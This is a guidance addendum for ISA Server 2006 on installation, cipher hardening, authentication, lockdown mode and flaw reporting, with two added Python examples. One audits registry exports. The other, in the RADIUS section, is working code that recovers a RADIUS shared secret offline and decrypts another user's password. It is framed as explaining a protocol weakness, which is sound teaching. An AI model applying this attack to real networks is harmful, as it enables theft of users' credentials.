Developer's Description (ISA Server 2006 Service Pack 1)

Microsoft Internet Security and Acceleration (ISA) Server 2006 Service Pack 1 introduces new features and functionality to ISA Server 2006 Standard and Enterprise Editions. The service pack includes:
• Configuration change tracking: registers all configuration changes applied to ISA Server, to help you assess issues that may occur as a result of these changes.
• Test button: tests the consistency of a Web publishing rule between the published server and ISA Server.
• Traffic simulator.
• Diagnostic Logging Viewer.
• Support for integrated NLB in all three modes: unicast, multicast, and multicast with Internet Group Management Protocol (IGMP). Previously, integrated NLB supported unicast mode only.
• Support for server certificates containing multiple Subject Alternative Name (SAN) entries. Previously, ISA Server could use only either the subject name (common name) of a server certificate or the first entry in the SAN list.
• Support for Kerberos Constrained Delegation (KCD) cross-domain authentication.
• Support for client certificate authentication in a workgroup deployment.

Microsoft Internet Security and Acceleration Server

1 Introduction to the Guidance Addendum

This document is required by the Common Criteria evaluation of Microsoft® Internet Security and Acceleration (ISA) Server 2006 Standard Edition and Enterprise Edition. It should be used by any administrator who wants to ensure that the deployed ISA Server 2006 [1] is the evaluated version (see [ST]). It is an addendum to the manual [MSISA] which is delivered with ISA Server 2006.
1.1 Scope

This document extends the ISA Server 2006 manual [MSISA] and provides the information required for the ISA Server 2006 Common Criteria evaluation.

[1] "ISA Server 2006" refers to both configurations, "ISA Server 2006 Standard Edition" and "ISA Server 2006 Enterprise Edition".

1.2 Security Functions and Associated Chapters

The relevant chapters of the security functionality are summarized in the following table.

Table 1.1 – Security functions and associated chapters
1.3 Warnings about Functions and Privileges

The administrator guidance contains warnings about functions and privileges that should be controlled in a secure processing environment. These are listed in the following table.

Table 1.2 – Warnings about functions and privileges
1.4 Installation of the Evaluated ISA Server 2006 Standard Edition

This section provides detailed installation instructions for Microsoft® Internet Security and Acceleration (ISA) Server 2006 Standard Edition.

1.4.1 Installation Requirements

To use ISA Server, you need:
• A personal computer with a 550-megahertz (MHz) or faster processor.
• Microsoft Windows Server® 2003, Standard Edition (English) Service Pack 1 (SP1) including MS05-042 (KB899587), MS05-039 (KB899588), MS05-027 (KB896422), and update KB907865. Also ensure that no additional software products have been installed on this computer.
• 256 megabytes (MB) of memory.
• 150 MB of available hard disk space. This is exclusive of hard disk space you want to use for caching.
• One network adapter that is compatible with the computer's operating system, for communication with the Internal network.
• An additional network adapter for each network connected to the ISA Server computer.
• One local hard disk partition that is formatted with the NTFS file system.
Please also check Section 3.5 "Requirements for the Operational Environment".

1.4.2 Installation Procedures

ISA Server 2006 Standard Edition is composed of the following components:
• ISA Server. This is the computer that runs the firewall.
• ISA Server Management. The console through which the administrator manages the enterprise.
• Advanced Logging. Note that the Advanced Logging component can only be installed on a computer running ISA Server services.
To install the evaluated version, the administrator must install ISA Server and ISA Server Management (file \ISAAutorun.exe). The following pictures show the step-by-step installation process for ISA Server 2006 Standard Edition.
Figure 1.1 – Disable weak algorithms

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\DES 56/56]
"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 40/128]
"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 40/128]
"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 56/128]
"Enabled"=dword:00000000

1.5 Installation of the Evaluated ISA Server 2006 Enterprise Edition

This section provides detailed installation instructions for Microsoft® Internet Security and Acceleration (ISA) Server 2006 Enterprise Edition.

1.5.1 Installation Requirements

To use ISA Server, you need:
• A personal computer with a 550-megahertz (MHz) or faster processor.
• Microsoft Windows Server® 2003, Standard Edition (English) Service Pack 1 (SP1) including MS05-042 (KB899587), MS05-039 (KB899588), MS05-027 (KB896422), and update KB907865. Also ensure that no additional software products have been installed on this computer.
• 256 megabytes (MB) or more of memory.
• 150 MB of available hard disk space. This is exclusive of hard disk space you want to use for caching.
• One network adapter that is compatible with the computer's operating system, for communication with the Internal network.
• An additional network adapter for each network connected to the ISA Server computer.
• One local hard disk partition that is formatted with the NTFS file system.
Please also check Section 3.5 "Requirements for the Operational Environment".

1.5.2 Installation Procedures

ISA Server 2006 Enterprise Edition is composed of the following components:
• ISA Server Management. The console through which the administrator manages the enterprise.
• Configuration Storage server. The repository of the enterprise layout and the configuration for each server in the enterprise. This repository is an instance of Active Directory® Application Mode (ADAM). Each ISA Server computer has a local copy of its configuration that is a replica of the server's configuration, which is located on the Configuration Storage server.
• ISA Server services. This is the computer that runs the firewall. The computer running ISA Server services is connected to a Configuration Storage server, which stores the configuration information.
• Additional components. Additional components (Advanced Logging, Firewall Client Share, and Message Screener) can be installed on separate computers. Note that the Advanced Logging component can only be installed on a computer running ISA Server services.
To install the evaluated version, the administrator must install ISA Server Management and the Configuration Storage server (file \ISAAutorun.exe) on the same machine. The following pictures show the step-by-step installation process for ISA Server 2006 Enterprise Edition.
Figure 1.2 – Disable weak algorithms

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\DES 56/56]
"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 40/128]
"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 40/128]
"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 56/128]
"Enabled"=dword:00000000

2 Security Functions

This chapter identifies all the security functions available to the administrator. The security functions are derived from the ISA Server 2006 security functions described in the ISA Server 2006 Security Target (ST).

Warnings
• The administrator must ensure that ISA Server 2006 is installed and used with Windows Server 2003. More details can be found in the Security Target of ISA Server 2006 Standard Edition/Enterprise Edition [ST].
• The administrator has to observe the Security Bulletins, to ensure that all possible countermeasures are used. The administrator should check http://www.microsoft.com/security/ regularly for the latest ISA Server 2006 service packs and hotfixes.
• The administrator should only use programs that are required to administer and operate the firewall. The administrator should not install additional software which may compromise the security of the TOE or the underlying operating system.

2.1 SF1 – Web Identification and Authentication

The TOE can be configured in a way that only particular users are allowed to access the networks through the TOE using Forms-based authentication.
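The registry fragments in Figures 1.1 and 1.2 disable the 40- and 56-bit SCHANNEL ciphers, which is how the SF1 warning to enforce at least 128-bit SSL is met on Windows Server 2003, and the SF2 warning in section 2.2 adds the DisableIPSourceRouting value from the MS06-032 workaround. The following Python script is an added example, not part of the addendum or of ISA Server: it parses a text export of those keys (`reg export "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL" schannel.reg` produces one; reg.exe writes UTF-16, which the loader handles) and reports any weak cipher that is still enabled or has no Enabled value, and whether DisableIPSourceRouting is set to 2. The Tcpip\Parameters key path is the one given in the MS06-032 bulletin workaround; the addendum itself names only the value. The sample export embedded in the script is constructed for the demonstration.

```python
"""Audit a Windows .reg export against the SCHANNEL and IP source routing hardening
described in the ISA Server 2006 CC guidance addendum. Added example; not part of
the addendum or of ISA Server."""
import re

# Weak cipher subkeys named in Figures 1.1 / 1.2 of the addendum.
WEAK_CIPHERS = ("DES 56/56", "RC2 40/128", "RC4 40/128", "RC4 56/128")
SCHANNEL_CIPHERS = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers"
# Key path from the MS06-032 workaround (the addendum states only the value name and data).
TCPIP_PARAMS = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters"

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VAL_RE = re.compile(r'^"([^"]+)"=(.+)$')


def load_reg(path):
    """Read a .reg file. reg.exe writes UTF-16 with a BOM; hand-written files are usually UTF-8."""
    with open(path, "rb") as fh:
        raw = fh.read()
    return raw.decode("utf-16") if raw.startswith(b"\xff\xfe") else raw.decode("utf-8-sig")


def parse_reg(text):
    """Parse 'Windows Registry Editor Version 5.00' text into {key: {value_name: data}}.

    Keys and value names are lower-cased because the registry is case-insensitive.
    dword:xxxxxxxx becomes an int, "..." becomes a str; other types (hex:, @=) are
    kept raw or skipped, which is enough for the keys audited here.
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1).lower()
            keys.setdefault(current, {})
            continue
        m = _VAL_RE.match(line)
        if m and current is not None:
            name, data = m.group(1).lower(), m.group(2)
            if data.startswith("dword:"):
                data = int(data[len("dword:"):], 16)
            elif len(data) >= 2 and data[0] == '"' and data[-1] == '"':
                data = data[1:-1]
            keys[current][name] = data
    return keys


def audit(keys):
    """Return a list of findings; an empty list means the export matches the guidance."""
    findings = []
    for cipher in WEAK_CIPHERS:
        enabled = keys.get(f"{SCHANNEL_CIPHERS}\\{cipher}".lower(), {}).get("enabled")
        if enabled is None:
            # No Enabled value means the SCHANNEL default applies, and on Windows
            # Server 2003 these ciphers are enabled by default.
            findings.append(f"{cipher}: no Enabled value (default is enabled)")
        elif enabled != 0:
            findings.append(f"{cipher}: Enabled=0x{enabled:08x}, expected 0")
    dsr = keys.get(TCPIP_PARAMS.lower(), {}).get("disableipsourcerouting")
    if dsr != 2:
        findings.append(f"DisableIPSourceRouting={dsr!r}, expected 2 (MS06-032)")
    return findings


# Constructed sample export: three ciphers disabled, RC4 56/128 still enabled,
# and no DisableIPSourceRouting value under Tcpip\Parameters.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\DES 56/56]
"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 40/128]
"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 40/128]
"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 56/128]
"Enabled"=dword:ffffffff

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"EnableICMPRedirect"=dword:00000000
"""

# The same export after applying Figure 1.1/1.2 and the MS06-032 value.
HARDENED_EXPORT = (
    SAMPLE_EXPORT.replace('"Enabled"=dword:ffffffff', '"Enabled"=dword:00000000')
    + '"DisableIPSourceRouting"=dword:00000002\n'
)

if __name__ == "__main__":
    for finding in audit(parse_reg(SAMPLE_EXPORT)) or ["OK: export matches the guidance"]:
        print(finding)
```

To audit a real server, export both keys with reg.exe, concatenate the two files, and pass `load_reg(path)` to `parse_reg`; the script only reads exports, so it cannot change the server it is checking.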
Important

When you try to connect to a Web site via HTTP (not HTTPS) that is published using ISA Server 2006, you receive an error message (see Figure 2.1) when all of the following conditions are true:
• The Web listener has any one of the following authentication methods enabled:
  o Basic authentication
  o RADIUS authentication
  o Forms-based authentication
• The Web listener is configured to listen for HTTP traffic.
• The "Require all users to authenticate" check box is selected for the Web listener, or the Web publishing rules apply to a user set other than the default All Users user set.
• You connect to the published Web site by using HTTP instead of HTTPS.

If the ISA Server Web listener has Basic authentication enabled, you receive the following error message:
Error Code: 403 Forbidden. The page must be viewed over a secure channel (Secure Sockets Layer (SSL)). Contact the server administrator. (12211)

If the ISA Server Web listener has RADIUS authentication or Microsoft Outlook Web Access Forms-based authentication (cookie-auth) enabled, you receive the following error message:
Error Code: 500 Internal Server Error. An internal error occurred. (1359)

When you use HTTP-to-HTTP bridging, ISA Server 2006 does not enable traffic on the external HTTP port if the Web listener is configured to request one or more of the following kinds of credentials: Basic authentication, RADIUS authentication, Forms-based authentication. This behavior occurs because these kinds of credentials should be encrypted and must not be sent in plaintext over HTTP. [2]

[2] For ISA Server 2004 versions earlier than ISA Server 2004 SP2, you are prompted to enter credentials in plaintext. This behavior may cause the credentials to be transmitted over the network in plaintext if you have not implemented some other form of network security, such as an external Secure Sockets Layer (SSL) accelerator or an encrypted tunnel. ISA Server 2006 does not provide these forms of security.

Warnings
• When using Forms-based authentication, depending on the application on the computer, which could "cache" the password, the user must ensure that the environment is locked when it is unattended.
• To secure transferred user identification and authentication credentials, ensure that strong SSL encryption (at least 128 bit) is enforced.

2.2 SF2 – Information Flow Control

The TOE combines several security mechanisms to enforce the security policies at different network layers: a rule base for incoming and outgoing requests, Web and application filters, and system security configuration options.

Warning

The following Windows Server 2003 vulnerabilities require that the administrator, on computers without the corresponding updates, does not publish certain ports from the local host to the external interface, or ensures that a certain configuration has been applied:
• MS06-018 requires blocking the following ports to the local host at the firewall: all unsolicited inbound traffic on ports greater than 1024.
• MS06-032 requires disabling IP source routing. Disabling IP source routing will prevent an affected host from processing IP source-routed packets that could allow an attacker to execute code. IP source routing processing can be disabled by the following registry setting: add the DWORD value DisableIPSourceRouting and set it to 2. This value disables IP source routing processing. By default, this value does not exist.

2.3 SF3 – Audit

The TOE stores logging information in different log files:
• Firewall service log. The Firewall log contains records of packets that were dropped at the packet filter level. It is possible to turn on logging for packets that were permitted to traverse the firewall. Access rules can be configured selectively to create or not to create a log entry when a packet has been blocked or permitted.
• Web proxy service log. The Web Proxy log stores one line per HTTP request that it receives. Each request (incoming and outgoing) is always logged.
• Windows application event log. The Windows application event log stores important system events and failures.

Warning

It should be ensured that there is always enough free disk space. Choosing the right resource and the right parameters for logging is mandatory. Creating logs that are too large or creating too many files can lead to problems. Nevertheless, it is possible to create an alert which will move or delete old or unneeded log files.

2.4 Administration-Related Interfaces

The administrator interacts with the TOE via a Microsoft Management Console snap-in. (The Microsoft Management Console is provided by the IT environment.) The application interacts with the local registry and local file system of the operating system (Windows Server 2003) and finally with the TOE.

Warning (Enterprise Edition only)

By default, policy changes are applied within a time frame of 15 seconds, since the relevant configuration data has to be polled from ADAM.

2.5 TOE User Interfaces

There are no user-related manuals provided. (Due to the nature of a firewall product, the filtering process is transparent to the user.)

3 Operating Environment

The security environment of the evaluated configurations of ISA Server 2006 is described in the ISA Server 2006 Standard Edition/Enterprise Edition Security Target [ST] and identifies the threats to be countered by ISA Server 2006, the organizational security policies, and the usage assumptions as they relate to ISA Server 2006. The administrator should ensure that the environment meets the organizational policies and assumptions. They are restated here from the Security Target.

3.1 Assumptions

Table 3.1 lists the TOE Secure Usage Assumptions for the IT environment and intended usage.

Table 3.1 – Assumptions for the IT environment and intended usage
3.2 Organizational Security Policies

Security policies to be fulfilled by the TOE are defined in Table 3.2.

Table 3.2 – Security policies addressed by the TOE
3.3 Secure Usage Assumptions – IT Security Requirements for the IT Environment

This chapter identifies the TOE security functional requirements for the IT environment. Further information about the Security Functional Requirements can be found in [ST].

Table 3.3 – TOE security functional requirements for the environment
3.4 Security Objectives for the Environment

Table 3.4 lists the security objectives for the environment (covering objectives for both the IT environment and the non-IT environment).

Table 3.4 – Security objectives for the environment
3.5 Requirements for the Operational Environment

The operational environment is a certified Windows Server 2003 Standard Edition (English) SP1 including MS05-042 (KB899587), MS05-039 (KB899588), MS05-027 (KB896422), and patch KB907865 (the same installation that was used for the Windows Server 2003 Common Criteria EAL 4+ evaluation; Validation Report Number CCEVS-VR-05-0131, [WINST] and [WINVR]).

When you scan your computer for available updates through the Windows Update Web site, the Windows Update Web site displays a number along with the title of the update, for example, "Update for Windows Media Player 9 Series (KB837272)". This KB number is included in the security bulletin to help identify the corresponding KB article in the Microsoft Knowledge Base.

Warning

The administrator should check http://www.microsoft.com/security/ regularly for the latest Windows Server 2003 hotfixes.

[3] Available online: http://go.microsoft.com/fwlink/?LinkID=24507

4 Security-Relevant Events

This section describes all types of security-relevant events and what administrator action (if any) to take to maintain security. Security-relevant events that may occur during operation of ISA Server 2006 must be adequately defined to allow administrator intervention to maintain secure operation. Security-relevant events are defined as events that signify a security-related change in the system or environment. These changes can be grouped as routine or abnormal. The routine events are already addressed in the Security Functions section.

Table 4.1 – Security-relevant events
5 TOE Integrity

This chapter describes how the administrator can verify that the evaluated version of the TOE is used.

5.1 Integrity of the CD-ROM Content

Customers can check the CD content by using the publicly available Microsoft File Checksum Integrity Verifier (FCIV) tool [4]:
• ISA Server 2006 Standard Edition (on CD-ROM)
• ISA Server 2006 Enterprise Edition (on CD-ROM)
The corresponding hash files are available from the Microsoft corporate Web site, as well as a batch file that runs the tool and a Readme file that explains the usage for users who do not have access to this document. The hash file contains SHA-1 values for each of the relevant files that must be verified and is downloadable over a secured channel from the ISA Server Common Criteria Web page. Perform the following steps to ensure the integrity of your downloads from this Web site:
1. Download the FCIV tool from http://support.microsoft.com/default.aspx?scid=kb;en-us;841290. The SHA-1 value of this download is 99fb35d97a5ee0df703f0cdd02f2d787d6741f65 (hex) and shall be verified before executing the download. This can be done using any tool capable of calculating SHA-1 values. Installation instructions and the download link are on the following Web page: http://support.microsoft.com/default.aspx?scid=kb;en-us;841290
2. Download "Integrity Check ISA 2006" and "CC Guidance Documentation Addendum" to the directory where FCIV has been extracted.
3. Open a command prompt and change to the directory where FCIV has been extracted.
4. Check the integrity of "Integrity Check ISA 2006" using fciv "Integrity Check ISA 2006.zip" -sha1 and verify that the result is
5. Check the integrity of the CC Guidance Addendum using fciv "CC Guidance Documentation Addendum for ISA 2006.pdf" -sha1 and verify that the result is
6. Follow the CC Guidance Addendum for further installation and configuration of the TOE.

Figure 5.1 – Example of Integrity check I (successful)
Figure 5.2 – Example of Integrity check II (missing FCIV tool)

5.2 Integrity of the Package

ISA Server 2006 Enterprise Edition is available in a volume license only (see Figure 5.4); there is no retail box with a certificate of authenticity (COA) label as there is for ISA Server 2006 Standard Edition (see Figure 5.3). Nevertheless, the end user should check the integrity as described in chapter 5.1 for ISA Server 2006 Standard Edition and ISA Server 2006 Enterprise Edition respectively.

Figure 5.3 – ISA Server 2006 Standard Edition (Box & CD-ROM)
Figure 5.4 – ISA Server 2006 Enterprise Edition (CD-ROM)

5.3 Version Number for the TOE

The method to examine the ISA Server version number is included in the Microsoft Management Console. The user can identify the version of the TOE in the Help menu (Help > About ISA Server 2006; see Figure 5.6). The version number presented in the Microsoft Management Console is 5.0.5720.100. That version corresponds to the evaluated version named in the ST, which is ISA Server 2006. From the About boxes it is not obvious which configuration of ISA Server 2006 is installed: when the branch "Enterprise" exists in the left pane of the management console, you have installed ISA Server 2006 EE (see Figure 5.7).

Figure 5.5 – Version number of ISA Server 2006 Standard Edition
Figure 5.6 – Version number of ISA Server 2006 Enterprise Edition
Figure 5.7 – Identifying ISA Server 2006 Enterprise Edition

6 Annotations

6.1 Authentication Methods

This chapter describes how ISA Server manages authentication. It provides information about the authentication and delegation methods supported by the TOE, and how the authentication process is handled.

6.1.1 Single Sign On

Single sign on (SSO) enables users to authenticate once to the TOE, and then access all of the Web servers with the same domain suffix that the TOE is publishing on a specific listener, without re-authenticating. Web servers can include Microsoft Outlook Web Access servers and servers running Microsoft Office SharePoint Portal Server 2003, as well as standard servers running Internet Information Services (IIS).

Security Notes
• There is no support for SSO between different Web listeners.
• Published servers must share the same Domain Name System (DNS) suffix. For example, you can configure SSO when publishing mail.fabrikam.com and team.fabrikam.com. You cannot configure SSO when publishing mail.fabrikam.com and mail.contoso.com. The DNS suffix consists of the entire string that follows the first dot. For example, to configure SSO between mail.detroit.contoso.com and mail.cleveland.contoso.com, you would use the DNS suffix contoso.com.

6.1.2 Authentication Process

There are three components of the authentication process in the TOE (front-end, gateway, and back-end authentication), spread over the following steps:
• Step 1, receipt of client credentials: The client sends a request to connect to the corporate Outlook Web Access server in the Internal network. The client provides the credentials in an HTML form (front-end authentication).
• Steps 2 and 3, sending credentials: The TOE sends the credentials to the authentication provider, such as a domain controller for Integrated Windows authentication, or a RADIUS server, and receives acknowledgment from the authentication provider that the user is authenticated (gateway authentication).
• Step 4, authentication delegation: The TOE forwards the client's request to the Outlook Web Access server, and authenticates itself to the Outlook Web Access server using the client's credentials. The Outlook Web Access server will revalidate those credentials, typically using the same authentication provider (back-end authentication). Note: The Web server must be configured to use the authentication scheme that matches the delegation method used by the TOE.
• Step 5, server response: The Outlook Web Access server sends a response to the client, which is intercepted by the TOE.
• Step 6, forwarding the response: The TOE forwards the response to the client.
6.1.3 Client Authentication Methods for Receipt of Client Credentials

The TOE Web listeners accept the following types of authentication from clients:

6.1.3.1 No Authentication

You can select to require no authentication. If you do so, you will not be able to configure a delegation method on rules that use this Web listener.

6.1.3.2 Forms-Based Authentication

Forms-based authentication in ISA Server 2006 can be used for publishing any Web server. One type of forms-based authentication is available in the TOE (the Passcode form and the Passcode/Password form have not been evaluated):
• Password form. The user enters a user name and password on the form. This is the type of credentials needed for Integrated and RADIUS credential validation.

Notes
• You should ensure that your Web application is designed to resist session riding attacks (also known as cross-site posting, cross-site request forgery, or luring attacks) before publishing it using the TOE. This is particularly important for Web servers published through the TOE, because clients must use the same trust level for all of the Web sites they access through the publishing ISA Server firewall.

6.1.4 Methods for Validation of Client Credentials

You can configure how the TOE validates client credentials. The TOE supports these providers and protocols:
Note: A publishing rule with a Web listener that uses a specific form of credential validation must use a user set that is consistent with that form of validation. For example, a publishing rule with a Web listener that uses LDAP credential validation must also use a user set that consists of LDAP users.

6.1.4.1 Configuring Receipt and Validation of Client Credentials

You can configure the receipt and validation of client credentials on the Web listener for a publishing rule.

Important: When you use the same Web listener to publish more than one application in the same domain, a user who is authenticated for one application will also be able to access the others, even if single sign on is not enabled.

6.1.4.2 Integrated

The TOE checks whether the user is a member of the local user database.

6.1.4.3 RADIUS Authentication

RADIUS is used to provide credential validation. When ISA Server is acting as a RADIUS client, it sends user credentials and connection parameter information in the form of a RADIUS message to a RADIUS server. The RADIUS server authenticates the RADIUS client request and sends back a RADIUS message response.

6.1.4.3.1 Configuring the TOE for RADIUS authentication

When you configure the Web listener on ISA Server, select RADIUS authentication as the authentication provider. When you add a RADIUS server, you must configure the following:

6.1.4.3.2 Security considerations

The RADIUS User-Password hiding mechanism might not provide sufficient security for passwords. The hiding mechanism uses the RADIUS shared secret, the Request Authenticator, and the MD5 hashing algorithm to encrypt the User-Password and other attributes, such as Tunnel-Password and MS-CHAP-MPPE-Keys. RFC 2865 notes the potential need for evaluating the threat environment and determining whether additional security should be used.
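To make the RFC 2865 caveat concrete, here is an added example (mine, not part of the addendum or of ISA Server) that implements the User-Password hiding from RFC 2865 section 5.2 as a RADIUS client such as the ISA Server Web listener performs it, and then shows why it is weak: the hiding is a chain of 16-byte MD5 keystream blocks derived only from the shared secret and the 16-byte Request Authenticator, XORed with the NUL-padded password. Anyone who captures one Access-Request whose password they already know (their own account) obtains the first keystream block, can test candidate shared secrets against it offline, and with the recovered secret can unhide every other User-Password exchanged between that client and server. All secrets, passwords, and the wordlist are constructed for the demonstration.

```python
"""RFC 2865 section 5.2 User-Password hiding, plus the offline attack it invites.
Added example; not code from the ISA Server 2006 addendum or from ISA Server."""
import hashlib
import os


def _xor16(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def hide_password(password: bytes, secret: bytes, request_authenticator: bytes) -> bytes:
    """Hide a User-Password the way a RADIUS client does before sending Access-Request.

    The password is NUL-padded to a multiple of 16 bytes. Block i is XORed with
    b_i = MD5(secret || prev), where prev is the Request Authenticator for the
    first block and the previous ciphertext block afterwards (RFC 2865, 5.2).
    """
    if not 1 <= len(password) <= 128:
        raise ValueError("User-Password must be 1..128 bytes")
    if len(request_authenticator) != 16:
        raise ValueError("Request Authenticator must be 16 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    out = bytearray()
    prev = request_authenticator
    for i in range(0, len(padded), 16):
        block = _xor16(padded[i:i + 16], hashlib.md5(secret + prev).digest())
        out += block
        prev = block
    return bytes(out)


def unhide_password(hidden: bytes, secret: bytes, request_authenticator: bytes) -> bytes:
    """Inverse of hide_password, as the RADIUS server performs it."""
    if not hidden or len(hidden) % 16:
        raise ValueError("hidden User-Password must be a non-empty multiple of 16 bytes")
    out = bytearray()
    prev = request_authenticator
    for i in range(0, len(hidden), 16):
        block = hidden[i:i + 16]
        out += _xor16(block, hashlib.md5(secret + prev).digest())
        prev = block
    # Strip the NUL padding; RFC 2865 forbids NUL inside a User-Password.
    return bytes(out).rstrip(b"\x00")


def recover_secret(request_authenticator: bytes, hidden: bytes, known_password: bytes, candidates):
    """Offline dictionary attack on the shared secret.

    With one captured Access-Request whose cleartext password is known, the first
    keystream block is b_1 = c_1 XOR p_1, and a candidate secret S is correct
    exactly when MD5(S || RequestAuthenticator) == b_1. Nothing is sent to the
    server, so its logging and lockout never observe the guesses.
    """
    p1 = (known_password + b"\x00" * 16)[:16]
    b1 = _xor16(hidden[:16], p1)
    for cand in candidates:
        if hashlib.md5(cand + request_authenticator).digest() == b1:
            return cand
    return None


def demo():
    """Capture two requests, recover the secret from the first, decrypt the second."""
    secret = b"isa-radius-2006"           # constructed shared secret
    ra_mine = os.urandom(16)              # Request Authenticators are random per request
    ra_victim = os.urandom(16)
    hidden_mine = hide_password(b"MyOwnPassw0rd", secret, ra_mine)
    hidden_victim = hide_password(b"S3cretOfSomeoneElse", secret, ra_victim)
    wordlist = [b"radius", b"password", b"isa-radius-2006", b"contoso"]  # constructed
    found = recover_secret(ra_mine, hidden_mine, b"MyOwnPassw0rd", wordlist)
    victim = unhide_password(hidden_victim, found, ra_victim) if found else None
    return found, victim


if __name__ == "__main__":
    recovered, other = demo()
    print("recovered shared secret:", recovered)
    print("other user's password:", other)
```

The defence the RFC alludes to is to stop relying on the hiding: use a long random shared secret so the dictionary step fails, and carry the RADIUS traffic between ISA Server and the RADIUS server inside an encrypted tunnel such as IPsec, which also protects the Request Authenticator from being read in the first place.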
6.1.5 Authentication Delegation

After validating the credentials, you can configure publishing rules to use one of the following methods to delegate the credentials to the published servers:

6.1.5.1 Configuring Authentication Delegation

Delegation of client credentials is configured on the publishing rule. In the Publishing Rule Wizard, configure this on the Authentication Delegation page. In the publishing rule properties, the authentication settings are on the Authentication Delegation tab.

6.1.5.2 No Delegation, and Client Cannot Authenticate Directly

Credentials are not delegated. This is intended to prevent the unintentional delegation of credentials into the organization, where they might be sniffed. This is the default setting in some ISA Server publishing wizards, so if you want to delegate credentials, you must change the default.

6.1.5.3 No Delegation, but Client May Authenticate Directly

When you select the delegation method No Delegation, but client may authenticate directly, the user's credentials are passed to the destination server without any additional action on the part of ISA Server. The client and the destination server then negotiate the authentication.

6.1.5.4 Basic Delegation

In Basic delegation, credentials are forwarded in plaintext to the server that requires credentials. If authentication fails, ISA Server replaces the delegation with the authentication type used by the Web listener. If the server requires a different type of credentials, an ISA Server alert is triggered.

6.2 Lockdown Mode

A critical function of a firewall is to react to an attack. When an attack occurs, it may seem that the first line of defense is to disconnect from the Internet, isolating the compromised network from malicious outsiders. However, this is not the recommended approach. Although the attack must be handled, normal network connectivity must be resumed as quickly as possible, and the source of the attack must be identified. ISA Server enters lockdown mode in either of two cases:
• An event triggers the Firewall service to shut down. When you configure alert definitions, you decide which events will cause the Firewall service to shut down. Essentially, you configure when ISA Server enters lockdown mode.
• The Firewall service is manually shut down. If you become aware of malicious attacks, you can shut down the Firewall service while configuring the ISA Server computer and the network to handle the attacks.

6.2.1 Affected functionality

When in lockdown mode, the following functionality applies:
• The packet filter driver applies the firewall policy.
• The following system policy rules are still applicable:
  o Allow ICMP from trusted servers to the local host.
  o Allow remote management of the firewall using MMC (RPC through port 3847).
  o Allow remote management of the firewall using RDP.
• Outgoing traffic from the Local Host network to all networks is allowed. If an outgoing connection is established, that connection can be used to respond to incoming traffic. For example, a DNS query can receive a DNS response on the same connection.
• No incoming traffic is allowed, unless a system policy rule (listed previously) that specifically allows the traffic is enabled. The one exception is DHCP traffic, which is allowed by default system policy rules: the UDP Send protocol on port 68 is allowed from all networks to the Local Host network, and the corresponding UDP Receive protocol on port 67 is allowed.
• VPN remote access clients cannot access ISA Server. Similarly, access is denied to remote site networks in site-to-site VPN scenarios.
• Any changes to the network configuration while in lockdown mode are applied only after the Firewall service restarts and ISA Server exits lockdown mode. For example, if you physically move a network segment and reconfigure ISA Server to match the physical changes, the new topology is in effect only after ISA Server exits lockdown mode.
• ISA Server does not trigger any alerts.
• For ISA Server Enterprise Edition, if the Configuration Storage server is installed on the computer running ISA Server services, a system policy rule named "Allow access from trusted servers to the local Configuration Storage server" is enabled. This rule allows the use of the Microsoft CIFS (TCP), Microsoft CIFS (UDP), and MS Firewall Storage protocols from all array members to the Local Host, and it is applied even in lockdown mode, so traffic using those protocols is allowed.

6.2.2 Leaving lockdown mode

When the Firewall service restarts, ISA Server exits lockdown mode and continues functioning as previously. Any changes made to the ISA Server configuration are applied after ISA Server exits lockdown mode.

7 Flaw Remediation Guidance

7.1 How to report detected security flaws to Microsoft

Microsoft has established a single internal organization, the Microsoft Security Response Center (MSRC), to investigate and remedy security vulnerabilities
involving Microsoft software or services. The MSRC is staffed 7 days a week and investigates every report it receives of suspected security vulnerabilities in Microsoft products. A report should include:
• Reporter contact information (name and e-mail; optional)
• Information about the reporter's computer (manufacturer and model, additional hardware, operating system, system service packs, operating system security patches)
• Affected product information (product name, product version, service packs for the product, security patches for the product, vulnerability information)
• Description of the flaw in the product (general description)
• Product configuration (default/customized, required settings to make the flaw appear)
• Description of how to reproduce the problem (step-by-step instructions that demonstrate the flaw, program that demonstrates the flaw)
